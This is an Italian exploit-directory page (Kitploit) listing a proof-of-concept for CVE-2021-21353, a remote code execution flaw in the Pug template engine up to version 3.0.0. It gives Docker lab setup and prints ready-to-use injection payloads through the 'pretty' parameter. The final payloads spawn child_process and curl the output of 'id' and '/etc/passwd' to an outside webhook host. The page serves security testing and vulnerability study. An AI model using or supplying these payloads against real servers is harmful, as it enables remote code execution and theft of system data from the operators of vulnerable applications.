Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PUG-RCE-CVE-2021-21353-POC — Exploit proof-of-concept per CVE-2021-21353, una vulnerabilità di esecuzione remota di codice nel motore di template Pug versioni <=3.0.0. Dimostra l'iniezione di payload tramite il parametro 'pretty' per eseguire comandi arbitrari. | Kitploit
Strumenti/GitHubGitHub/jinsu9758/pug-rce-cve-2021-21353-poc
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingSviluppo Payload
GitHubjinsu9758/pug-rce-cve-2021-21353-poc

PUG-RCE-CVE-2021-21353-POC

Exploit proof-of-concept per CVE-2021-21353, una vulnerabilità di esecuzione remota di codice nel motore di template Pug versioni <=3.0.0. Dimostra l'iniezione di payload tramite il parametro 'pretty' per eseguire comandi arbitrari.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PUG-RCE (CVE-2021-21353) POC

Informazioni sulla vulnerabilità

Numero CVE : cve-2021-21353
Punteggio CVSS : 8.1

< Versioni vulnerabili >
pug_version <= 3.0.0
2.0.3 < pug-code-gen version, 3.0.0<= pug-code-gen version < 3.0.2


Configurazione dell'ambiente

git clone https://github.com/jinsu9758/PUG-RCE-CVE-2021-21353-POC.git
cd PUG-RCE-CVE-2021-21353-POC
sudo docker compose up

※ Accessibile sulla porta 3000


Payload

Test del payload
?pretty=');console.log('executed');//

Payload finale
?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(id)\" <webhook_site>');_=('

?pretty=');process.mainModule.constructor._load('child_process').exec('curl -X POST -d \"$(cat /etc/passwd)\" <webhook_site>');_=('

Scarica lo strumento